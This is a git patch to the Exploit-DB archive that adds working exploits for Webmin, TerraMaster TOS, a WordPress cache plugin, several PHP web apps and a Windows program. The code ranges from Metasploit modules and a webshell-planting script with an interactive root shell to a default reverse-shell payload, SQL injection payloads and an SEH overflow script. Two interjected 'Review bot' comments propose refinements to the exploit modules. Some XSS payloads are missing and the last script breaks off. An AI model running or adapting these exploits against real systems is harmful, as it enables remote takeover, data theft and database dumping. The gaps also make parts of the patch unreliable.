From 3aeb1a0d81e462f0af2863eb7f628c88de35eba0 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 23 Dec 2020 05:01:59 +0000 Subject: [PATCH] DB: 2020-12-23 12 changes to exploits/shellcodes 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) Victor CMS 1.0 - File Upload To RCE Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) CSE Bookstore 1.0 - Multiple SQL Injection Library Management System 3.0 - _Add Category_ Stored XSS Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit) Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit) Artworks Gallery Management System 1.0 - 'id' SQL Injection Faculty Evaluation System 1.0 - Stored XSS TerraMaster TOS 4.2.06 - RCE (Unauthenticated) --- exploits/linux/webapps/49318.rb | 165 ++++++++++++++++++++++++++++++++ exploits/linux/webapps/49321.py | 66 +++++++++++++ exploits/php/webapps/49307.txt | 1 + exploits/php/webapps/49310.txt | 19 ++++ exploits/php/webapps/49312.txt | 82 ++++++++++++++++ exploits/php/webapps/49314.txt | 110 +++++++++++++++++++++ exploits/php/webapps/49315.txt | 20 ++++ exploits/php/webapps/49316.txt | 18 ++++ exploits/php/webapps/49317.rb | 86 +++++++++++++++++ exploits/php/webapps/49319.txt | 64 +++++++++++++ exploits/php/webapps/49320.txt | 19 ++++ exploits/windows/local/49322.py | 78 +++++++++++++++ files_exploits.csv | 11 +++ 13 files changed, 739 insertions(+) create mode 100755 exploits/linux/webapps/49318.rb create mode 100755 exploits/linux/webapps/49321.py create mode 100644 exploits/php/webapps/49310.txt create mode 100644 exploits/php/webapps/49312.txt create mode 100644 exploits/php/webapps/49314.txt create mode 100644 exploits/php/webapps/49315.txt create mode 100644 exploits/php/webapps/49316.txt create mode 100755 exploits/php/webapps/49317.rb create mode 100644 exploits/php/webapps/49319.txt create mode 100644 exploits/php/webapps/49320.txt create mode 100755 exploits/windows/local/49322.py 
diff --git a/exploits/linux/webapps/49318.rb b/exploits/linux/webapps/49318.rb
new file mode 100755
index 000000000..965213565
--- /dev/null
+++ b/exploits/linux/webapps/49318.rb
@@ -0,0 +1,165 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)', + 'Description' => %q( + This module exploits an arbitrary command execution vulnerability in Webmin + 1.962 and lower versions. Any user authorized to the "Package Updates" + module can execute arbitrary commands with root privileges. + It emerged by circumventing the measure taken for CVE-2019-12840. + s/\\(-)|\\(.)/string/g; escape is not enough for prevention. + Therefore, since the package name variable is placed directly in the system command, + we can manipulate it using some escape characters that HTTP supports. + For example, we can escape control by dropping the command line down one line. 
+ We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly, + we must add double an ampersand(&&) to the end of the payload (%26%26) + ), + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', 'CVE-2020-35606'], + ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html'] + ], + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'DefaultOptions' => + { + 'RPORT' => 10000, + 'SSL' => false, + 'PAYLOAD' => 'cmd/unix/reverse_perl' + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [['Webmin <= 1.962', {}]], + 'DisclosureDate' => '2020-12-21', + 'DefaultTarget' => 0) + ) + register_options [ + OptString.new('USERNAME', [true, 'Webmin Username']), + OptString.new('PASSWORD', [true, 'Webmin Password']), + OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) + ] + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def login + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'session_login.cgi'), + 'cookie' => 'testing=1', # it must be used for "Error - No cookies" + 'vars_post' => { + 'page' => '', + 'user' => datastore['USERNAME'], + 'pass' => datastore['PASSWORD'] + } + }) + + if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/ + return $1 + end + + return nil unless res + '' + end + + def check + cookie = login + return CheckCode::Detected if cookie == '' + return CheckCode::Unknown if cookie.nil? 
+ + vprint_status('Attempting to execute...') + # check version + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"), + 'cookie' => "sid=#{cookie}", + 'vars_get' => { "xnavigation" => "1" } + }) + + if res && res.code == 302 && res.body + version = res.body.split("Webmin 1.")[1] + return CheckCode::Detected if version.nil? + version = version.split(" ")[0] + if version <= "962" + # check package update priv + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "package-updates/"), + 'cookie' => "sid=#{cookie}" + }) + + if res && res.code == 200 && res.body =~ /Software Package Update/ + print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<") + return CheckCode::Vulnerable + end + end + end + print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<") + print_status("Please try with another user account!") + CheckCode::Safe + end + + def exploit + cookie = login + if cookie == '' || cookie.nil? 
+ fail_with(Failure::Unknown, 'Failed to retrieve session cookie') + end + print_good("Session cookie: #{cookie}") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'), + 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" }, + 'cookie' => "sid=#{cookie}" + ) + unless res && res.code == 200 + fail_with(Failure::Unknown, 'Request failed') + end + + print_status("Attempting to execute the payload...") + run_update(cookie) + end + + def run_update(cookie) + @b64p = Rex::Text.encode_base64(payload.encoded) + perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"' + payload = Rex::Text.uri_encode(perl_payload) + + res = send_request_cgi( + { + 'method' => 'POST', + 'cookie' => "sid=#{cookie}", + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'), + 'headers' => + { + 'Referer' => "#{peer}/package-updates/?xnavigation=1" + }, + # new vector // bypass to backslash %0A%7C{}%26%26 + 'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26" + # for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages" + }) + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/49321.py b/exploits/linux/webapps/49321.py new file mode 100755 index 000000000..b62e60274 --- /dev/null +++ b/exploits/linux/webapps/49321.py 
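Review bot: The Description block that `info` prints for this module has wording errors on the hunk's description lines: `paylad` should read `payload`, `values.Also` needs a space after the period, and `we must add double an ampersand(&&)` should read `we must append a double ampersand (&&)`. The third Description line also says `1.962 and lower versions` while the target entry says `Webmin <= 1.962`; keeping both phrasings identical avoids readers wondering whether 1.962 itself is included. These are text-only changes and do not touch the request logic.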
@@ -0,0 +1,66 @@ +# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated) +# Date: 12/12/2020 +# Exploit Author: IHTeam +# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ +# Vendor Homepage: https://www.terra-master.com/ +# Version: <= 4.2.06 +# Tested on: 4.1.30, 4.2.06 + +#!/usr/bin/env python3 +import argparse +import requests +import time +import sys +import urllib.parse +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE") +parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/") +args = parser.parse_args() + +url = args.url +headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'} +epoch_time = int(time.time()) +shell_filename = "debug"+str(epoch_time)+".php" + +def check_endpoint(url, headers): + response = requests.get(url+'/version', headers=headers, verify=False) + if response.status_code == 200: + print("[+] TerraMaster TOS version: ", str(response.content)) + else: + print("\n[-] TerraMaster TOS response code: ", response.status_code) + sys.exit() + +def upload_shell(url, headers, shell_filename): + payload = "http|echo \"\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||" + payload = urllib.parse.quote(payload, safe='') + print("[/] Uploading shell...") + response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False) + time.sleep(1) + response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False) + if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')): + print("[+] Upload succeeded") + else: + print("\n[-] Error uploading shell: ", response.content) + sys.exit() + +def 
interactive_shell(url, headers, shell_filename, cmd): + response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False) + print(str(response.text)+"\n") + + +def delete_shell(url, headers, shell_filename): + delcmd = "rm /usr/www/"+shell_filename + response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False) + print("\n[+] Shell deleted") + +check_endpoint(url, headers) +upload_shell(url, headers, shell_filename) +try: + while True: + cmd = input("# ") + interactive_shell(url, headers, shell_filename, cmd) +except: + delete_shell(url, headers, shell_filename) \ No newline at end of file diff --git a/exploits/php/webapps/49307.txt b/exploits/php/webapps/49307.txt index 5c40e7e0c..05ded52b2 100644 --- a/exploits/php/webapps/49307.txt +++ b/exploits/php/webapps/49307.txt @@ -4,6 +4,7 @@ # Vendor: Phpgurukul # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 +# CVE: CVE-2020-35151 I DESCRIPTION ======================================================================== diff --git a/exploits/php/webapps/49310.txt b/exploits/php/webapps/49310.txt new file mode 100644 index 000000000..4166d900e --- /dev/null +++ b/exploits/php/webapps/49310.txt 
@@ -0,0 +1,19 @@ +# Exploit Title: Victor CMS 1.0 - File Upload To RCE +# Date: 20.12.2020 +# Exploit Author: Mosaaed +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Version: 1.0 + +# Tested on: Apache2/Linux + +Step1: register http://localhost/CMSsite-master/register.php +step2: login as user +step3: Go to Profile +step4: upload imag as php file (upload shell.php) +step5: update user +step6: You will find your shell in img folder :/path/img/cmd.php + +http://localhost/CMSsite-master/img/cmd.php?cmd=id + +uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file diff --git a/exploits/php/webapps/49312.txt b/exploits/php/webapps/49312.txt new file mode 100644 index 000000000..877268ee0 --- /dev/null +++ b/exploits/php/webapps/49312.txt 
@@ -0,0 +1,82 @@ +# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) +# Date: 12-21-2020 +# Exploit Author: Matthew Aberegg, Alex Prieto +# Vendor Homepage: https://pandorafms.com/ +# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c +# Software Link: https://pandorafms.com/community/get-started/ +# Version: Pandora FMS 7.0 NG 750 +# Tested on: Ubuntu 18.04 + + +# Vulnerability Details +# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS. +# Vulnerable Parameter : network_csv + + +# POC + +POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119 +Content-Length: 1597 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan +Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 +Upgrade-Insecure-Requests: 1 + +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_manual_defined" + +1 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_select" + +300 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_text" + +0 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval" + +0 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="interval_units" + +1 
+-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="taskname" + +test +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="id_recon_server" + +3 +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="network_csv_enabled" + +on +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="network_csv"; filename="test.txt" +Content-Type: text/plain + +' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a + +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="network" + + +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="comment" + +test +-----------------------------308827614039434535382911921119 +Content-Disposition: form-data; name="submit" + +Next +-----------------------------308827614039434535382911921119-- \ No newline at end of file diff --git a/exploits/php/webapps/49314.txt b/exploits/php/webapps/49314.txt new file mode 100644 index 000000000..277304140 --- /dev/null +++ b/exploits/php/webapps/49314.txt 
@@ -0,0 +1,110 @@ +# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection +# Date : 2020-12-21 +# Author : Musyoka Ian +# Version : CSE Bookstore 1.0 +# Vendor Homepage: https://projectworlds.in/ +# Platform : PHP +# Tested on : Debian + +CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on + +Below is results returned by SQLMap + +Type: boolean-based blind +Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) +Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based +Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF + +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT + + +POC 1 + +REQUEST +======== +GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 +Host: 192.168.196.83 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n +Upgrade-Insecure-Requests: 1 + +RESPONSE +======== + +HTTP/1.1 200 OK +Date: Mon, 21 Dec 2020 20:09:49 GMT +Server: Apache/2.4.38 (Debian) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 172 
+Connection: close +Content-Type: text/html; charset=UTF-8 + +Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1 + +POC 2 +Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter + +REQUEST +======= + +POST /ebook/cart.php HTTP/1.1 +Host: 192.168.196.83 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4 +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 +Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9 + + +bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart + +RESPONSE +======= +get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1 + +POC 3. 
+Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials + +REQUEST +======= +GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1 +Host: 192.168.196.83 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Referer: http://192.168.196.83/ebook/books.php +Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on + +RESPONSE +======== +HTTP/1.1 200 OK +Date: Mon, 21 Dec 2020 20:47:58 GMT +Server: Apache/2.4.38 (Debian) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 188 +Connection: close +Content-Type: text/html; charset=UTF-8 + +Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1 \ No newline at end of file diff --git a/exploits/php/webapps/49315.txt b/exploits/php/webapps/49315.txt new file mode 100644 index 000000000..8a0b431b1 --- /dev/null +++ b/exploits/php/webapps/49315.txt 
@@ -0,0 +1,20 @@ +# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS +# Exploit Author: Kislay Kumar +# Date: 2020-12-22 +# Google Dork: N/A +# Vendor Homepage: https://otsglobal.org/ +# Software Link: https://codecanyon.net/item/library-management-system-22/16965307 +# Affected Version: 3.0 +# Patched Version: Unpatched +# Category: Web Application +# Tested on: Kali Linux + +Step 1. Login as Admin. + +Step 2. Select "Book" from menu and select "Categories" from sub menu and +after that click on "Add Category". + +Step 3. Insert payload - "> in "Category Name" + +Step 4. Now Click on "Save" , Go to "Category" and See last , there you +will get alert box. \ No newline at end of file diff --git a/exploits/php/webapps/49316.txt b/exploits/php/webapps/49316.txt new file mode 100644 index 000000000..aecb5eb78 --- /dev/null +++ b/exploits/php/webapps/49316.txt @@ -0,0 +1,18 @@ +# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS +# Exploit Author: Kislay Kumar +# Date: 2020-12-21 +# Google Dork: N/A +# Vendor Homepage: https://www.ramomcoder.com/ +# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324 +# Affected Version: 3.5 +# Category: Web Application +# Tested on: Kali Linux + +Step 1. Login as Super Admin. + +Step 2. Select "Branch" from menu and after that click on "Create Branch". + +Step 3. Insert payload - "> in "Branch Name" , +"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State". + +Step 4. Now Click on "Save" and you will get a list of alert boxes. \ No newline at end of file diff --git a/exploits/php/webapps/49317.rb b/exploits/php/webapps/49317.rb new file mode 100755 index 000000000..75153361d --- /dev/null +++ b/exploits/php/webapps/49317.rb 
@@ -0,0 +1,86 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +# +## + +class MetasploitModule < Msf::Auxiliary +include Msf::Auxiliary::Report +include Msf::Exploit::Remote::HTTP::Wordpress +include Msf::Auxiliary::Scanner + +def initialize(info = {}) +super( +update_info( +info, +'Name' => 'WordPress W3 Total Cache File Read Vulnerability', +'Description' => %q{ +This module exploits an unauthenticated directory traversal vulnerability +in WordPress plugin +'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with +the web server privileges. +}, +'References' => +[ +['CVE', '2019-6715'], +['WPVDB', '9248'], +['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'], +['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'], +], +'Author' => +[ +'VinhJAXT', # Vulnerability discovery +'Hoa Nguyen - SunCSR Team' # Metasploit module +], +'DisclosureDate' => '2014-09-20', +'License' => MSF_LICENSE +) +) + +register_options( +[ +OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), +OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2]) +] +) +end + +def check +check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26') +end + +def run_host(ip) +traversal = '../' * datastore['DEPTH'] +filename = datastore['FILEPATH'] +filename = filename[1, filename.length] if filename =~ %r{^/} + +json_body = { 'Type' => "SubscriptionConfirmation", +'Message' => '', +'SubscribeURL' => "file:///#{traversal}#(unknown)" +} + +res = send_request_cgi({ +'method' => 'PUT', +'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'), +'ctype' => 'application/json', +'data' => JSON.generate(json_body) +}) + +fail_with Failure::Unreachable, 'Connection failed' unless res +fail_with Failure::NotVulnerable, 'Connection failed. 
Nothing was downloaded' unless res.code == 200 +fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? + +print_status('Downloading file...') +print_line("\n#{res.body}\n") + +fname = datastore['FILEPATH'] +path = store_loot( +'w3_total_cache.traversal', +'text/plain', +ip, +res.body, +fname +) +print_good("File saved in: #{path}") +end +end \ No newline at end of file diff --git a/exploits/php/webapps/49319.txt b/exploits/php/webapps/49319.txt new file mode 100644 index 000000000..79534b2ad --- /dev/null +++ b/exploits/php/webapps/49319.txt 
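Review bot: The affected-version range in the module metadata does not agree with the range `check` tests: the Description says `'W3 Total Cache' version 0.9.2.6-0.9.3`, while `check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')` reports 0.9.4 through 0.9.26 as vulnerable, so a scan driven by this module will either miss or over-report installs depending on which range is correct. The `'DisclosureDate' => '2014-09-20'` entry also does not match the 2019 CVE and the 2019/03 write-up listed under References. Confirm the fixed version from the referenced advisory and make the Description, the `check` bounds and the DisclosureDate agree; the version bounds themselves cannot be verified from this hunk.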
@@ -0,0 +1,64 @@ +# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection +# Exploit Author: Vijay Sachdeva +# Date: 2020-12-22 +# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code +# Affected Version: Version 1 +# Tested on Kali Linux + +Step 1. Log in to the application with admin credentials. + +Step 2. Click on "Explore" and then select "Artworks". + +Step 3. Choose any item, the URL should be " + +http://localhost/art-bay/info_art.php?id=6 + +Step 4. Run sqlmap on the URL where the "id" parameter is given + + +sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner + +--- + + +Parameter: id (GET) + + Type: boolean-based blind + + Title: AND boolean-based blind - WHERE or HAVING clause + + Payload: id=8 AND 4531=4531 + + + Type: time-based blind + + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + + Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG) + + + Type: UNION query + + Title: Generic UNION query (NULL) - 9 columns + + Payload: id=8 UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)-- +- + +--- + +[08:18:34] [INFO] the back-end DBMS is MySQL + +[08:18:34] [INFO] fetching banner + +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) + +banner: '10.3.24-MariaDB-2' + + +--- + + +Step 5. Sqlmap should inject the web-app successfully which leads to +information disclosure. \ No newline at end of file diff --git a/exploits/php/webapps/49320.txt b/exploits/php/webapps/49320.txt new file mode 100644 index 000000000..1e5bbafe3 --- /dev/null +++ b/exploits/php/webapps/49320.txt 
@@ -0,0 +1,19 @@ +# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS +# Exploit Author: Vijay Sachdeva (pwnshell) +# Date: 2020-12-22 +# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code +# Tested on Kali Linux + +Step 1: Log in to the application with admin credentials + +Step 2: Click on Questionnaires, then click "Action" for any Academic Year +and then click manage. + +Step 3. Input "" in "Question" field of +the Question form. + +Step 4. Click on "Save" when done and this will trigger the Stored XSS +payloads. Whenever you click on Questionnaires, click action for any +academic year, and then manage, your XSS Payloads will be triggered for +that "Academic Year" \ No newline at end of file diff --git a/exploits/windows/local/49322.py b/exploits/windows/local/49322.py new file mode 100755 index 000000000..a338228d0 --- /dev/null +++ b/exploits/windows/local/49322.py 
@@ -0,0 +1,78 @@ +# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) +# Date: 2020-12-22 +# Exploit Author: Florian Gassner +# Vendor Homepage: https://www.10-strike.com/ +# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe +# Version: 9.05 +# Tested on: Windows 10 x64 + +# Computer -> From Text File -> Choose exploit.txt + +import struct + +""" +Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214 +""" + +OFFSET = 214 + +""" +badchars = '\x00\x09\x0a\x0d\x3a\x5c' +""" + +""" +Log data, item 23 + Address=01015AF4 + Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe +""" + +pop_pop_ret = struct.pack("